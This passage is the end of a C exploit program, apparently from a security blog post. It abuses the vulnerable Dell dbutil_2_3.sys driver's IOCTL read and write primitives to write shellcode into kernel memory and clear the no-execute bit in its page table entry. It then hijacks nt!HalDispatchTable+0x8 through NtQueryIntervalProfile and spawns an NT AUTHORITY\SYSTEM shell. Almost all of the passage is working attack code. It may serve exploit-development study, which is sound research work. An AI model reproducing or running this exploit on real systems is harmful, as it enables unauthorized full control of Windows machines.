          sizeof(inBuf8),
          &bytesReturned8,
          NULL
        );

        BOOL interact8 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf9,
          sizeof(inBuf9),
          &inBuf9,
          sizeof(inBuf9),
          &bytesReturned9,
          NULL
        );

        BOOL interact9 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf10,
          sizeof(inBuf10),
          &inBuf10,
          sizeof(inBuf10),
          &bytesReturned10,
          NULL
        );

        BOOL interact10 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf11,
          sizeof(inBuf11),
          &inBuf11,
          sizeof(inBuf11),
          &bytesReturned11,
          NULL
        );

        // A lot of error handling
        if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
        {
          printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          exit(-1);
        }
        else
        {
          printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

          // Clear the no-eXecute bit
          unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

          printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

          // Clear the no-eXecute bit in the actual PTE
          // Buffer to send to the driver (write primitive)
          unsigned long long inBuf13[4];

          // Values to send
          unsigned long long one13 = 0x4141414141414141;
          unsigned long long two13 = shellcodePte;
          unsigned long long three13 = 0x0000000000000000;
          unsigned long long four13 = taintedPte;

          // Assign the values
          inBuf13[0] = one13;
          inBuf13[1] = two13;
          inBuf13[2] = three13;
          inBuf13[3] = four13;


          // Interact with the driver
          DWORD bytesReturned13 = 0;

          BOOL interact12 = DeviceIoControl(
            driverHandle,
            IOCTL_WRITE_CODE,
            &inBuf13,
            sizeof(inBuf13),
            &inBuf13,
            sizeof(inBuf13),
            &bytesReturned13,
            NULL
          );

          // Error handling
          if (!interact12)
          {
            printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          }
          else
          {
            printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

            // Offset to nt!HalDispatchTable+0x8
            unsigned long long halDispatch = baseofKernel + 0x427258;

            // Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
            // Buffer to send to the driver (write primitive)
            unsigned long long inBuf14[4];

            // Values to send
            unsigned long long one14 = 0x4141414141414141;
            unsigned long long two14 = halDispatch;
            unsigned long long three14 = 0x0000000000000000;
            unsigned long long four14 = 0x0000000000000000;

            // Assign the values
            inBuf14[0] = one14;
            inBuf14[1] = two14;
            inBuf14[2] = three14;
            inBuf14[3] = four14;

            // Interact with the driver
            DWORD bytesReturned14 = 0;

            BOOL interact13 = DeviceIoControl(
              driverHandle,
              IOCTL_READ_CODE,
              &inBuf14,
              sizeof(inBuf14),
              &inBuf14,
              sizeof(inBuf14),
              &bytesReturned14,
              NULL
            );

            // Error handling
            if (!interact13)
            {
              printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
            }
            else
            {
              // Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
              unsigned long long preservedHal = inBuf14[3];

              printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

              // Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
              // Buffer to send to the driver (write primitive)
              unsigned long long inBuf15[4];

              // Values to send
              unsigned long long one15 = 0x4141414141414141;
              unsigned long long two15 = halDispatch;
              unsigned long long three15 = 0x0000000000000000;
              unsigned long long four15 = shellcodeLocation;

              // Assign the values
              inBuf15[0] = one15;
              inBuf15[1] = two15;
              inBuf15[2] = three15;
              inBuf15[3] = four15;

              // Interact with the driver
              DWORD bytesReturned15 = 0;

              BOOL interact14 = DeviceIoControl(
                driverHandle,
                IOCTL_WRITE_CODE,
                &inBuf15,
                sizeof(inBuf15),
                &inBuf15,
                sizeof(inBuf15),
                &bytesReturned15,
                NULL
              );

              // Error handling
              if (!interact14)
              {
                printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
              }
              else
              {
                printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

                // Locating nt!NtQueryIntervalProfile
                NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
                  GetModuleHandle(
                    TEXT("ntdll.dll")),
                  "NtQueryIntervalProfile"
                );

                // Error handling
                if (!NtQueryIntervalProfile)
                {
                  printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
                  exit(1);
                }
                else
                {
                  // Print update for found ntdll!NtQueryIntervalProfile
                  printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

                  // Calling nt!NtQueryIntervalProfile
                  ULONG exploit = 0;

                  NtQueryIntervalProfile(
                    0x1234,
                    &exploit
                  );

                  // Restoring nt!HalDispatchTable+0x8
                  // Buffer to send to the driver (write primitive)
                  unsigned long long inBuf16[4];

                  // Values to send
                  unsigned long long one16 = 0x4141414141414141;
                  unsigned long long two16 = halDispatch;
                  unsigned long long three16 = 0x0000000000000000;
                  unsigned long long four16 = preservedHal;

                  // Assign the values
                  inBuf16[0] = one16;
                  inBuf16[1] = two16;
                  inBuf16[2] = three16;
                  inBuf16[3] = four16;

                  // Interact with the driver
                  DWORD bytesReturned16 = 0;

                  BOOL interact15 = DeviceIoControl(
                    driverHandle,
                    IOCTL_WRITE_CODE,
                    &inBuf16,
                    sizeof(inBuf16),
                    &inBuf16,
                    sizeof(inBuf16),
                    &bytesReturned16,
                    NULL
                  );

                  // Error handling
                  if (!interact15)
                  {
                    printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
                  }
                  else
                  {
                    printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
                    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

                    // Spawning an NT AUTHORITY\SYSTEM shell
                    system("cmd.exe /c cmd.exe /K cd C:\\");
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}

// Call exploitWork()
void main(void)
{
  exploitWork();
}

Tags:

Updated: